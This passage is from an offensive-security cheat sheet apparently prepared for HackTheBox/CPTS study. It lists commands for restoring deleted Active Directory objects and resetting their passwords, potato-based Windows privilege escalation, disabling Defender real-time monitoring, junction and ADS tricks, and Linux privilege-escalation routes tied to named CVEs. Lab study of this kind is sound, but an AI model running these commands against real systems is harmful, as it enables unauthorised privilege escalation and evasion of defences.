    631 ## // AD RECYCLE BIN / DELETED OBJECTS (TombWatcher, Voleur)
    632 
    633 > [!terminal]+
    634 > ```powershell
    635 > Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property objectSid,lastKnownParent
    636 > Restore-ADObject -Identity <GUID>
    637 > Set-ADAccountPassword <user> -NewPassword (ConvertTo-SecureString '0xdf0xdf!' -AsPlainText -Force)
    638 > ```
    639 > ```bash
    640 > # or via NetExec tombstone module (Voleur)
    641 > nxc ldap $DC -u svc -p pw -k -M tombstone -o ACTION=query
    642 > nxc ldap $DC -u svc -p pw -k -M tombstone -o ACTION=restore ID=<GUID> SCHEME=ldap
    643 > ```
    644 
    645 ---
    646 
    647 ## // WINDOWS PRIVESC — extras
    648 
    649 > [!terminal]+ Potatoes, ADS, junctions (Media, Ghost, Jeeves)
    650 > ```powershell
    651 > # SeImpersonate: FullPowers restores stripped privs, then a potato
    652 > .\FullPowers.exe -c 'cmd /c <payload>' -z
    653 > .\GodPotato-NET4.exe -cmd "cmd /c <payload>"
    654 > # if Defender eats GodPotato, compile EfsPotato on-box:
    655 > C:\Windows\Microsoft.net\framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618
    656 > Set-MpPreference -DisableRealtimeMonitoring $True     # once you can
    657 > # Alternate Data Stream (Jeeves)
    658 > dir /R ; more < hm.txt:root.txt
    659 > # junction point → make a service write into web root (Media)
    660 > cmd /c mklink /J C:\target\dir C:\xampp\htdocs
    661 > ```
    662 
    663 ---
    664 
    665 ## // LINUX PRIVESC — extras (Postman, Trick, Craft, Snoopy)
    666 
    667 > [!terminal]+
    668 > ```bash
    669 > # sudo -l wins seen on the box list:
    670 > #  fail2ban action rewrite (Trick): edit actionban in /etc/fail2ban/action.d/iptables-multiport.conf
    671 > #  git apply symlink CVE-2023-23946 (Snoopy)
    672 > #  clamscan --file-list <file> reads root.txt/id_rsa; or XXE CVE-2023-20052 (Snoopy)
    673 > # Webmin CVE-2019-12840 (Postman) — Package Updates module RCE as root
    674 > # HashiCorp Vault SSH OTP (Craft):
    675 > vault ssh -mode=otp -role=root_otp root@127.0.0.1
    676 > # SSH ControlMaster socket reuse in a container (Ghost):
    677 > ssh user@host   # reuses ~/.ssh/controlmaster/*@host:22 without creds
    678 > ```
    679 
    680 ---
    681 
    682 ## // REFERENCES
    683 
    684 > [!info] (used to build the workflow)
    685 > - Fluffy, TombWatcher, Redelegate, VulnCicada, Media, Pov, Snoopy, Authority, StreamIO — [0xdf](https://0xdf.gitlab.io/)
    686 > - [Certipy Wiki — ESC techniques](https://github.com/ly4k/Certipy/wiki)
    687 > - [The Hacker Recipes — AD](https://www.thehacker.recipes/)
    688 > - [HackTricks — AD methodology](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology)
    689 > - [GTFOBins](https://gtfobins.github.io/) · [LOLBAS](https://lolbas-project.github.io/) · [NetExec wiki](https://www.netexec.wiki/)
    690 
    691 ---
    692 
    693 #Command-Reference #Cheatsheet #CPTS-Prep #AD #ADCS #Kerberos #Enumeration #Privilege-Escalation #HTB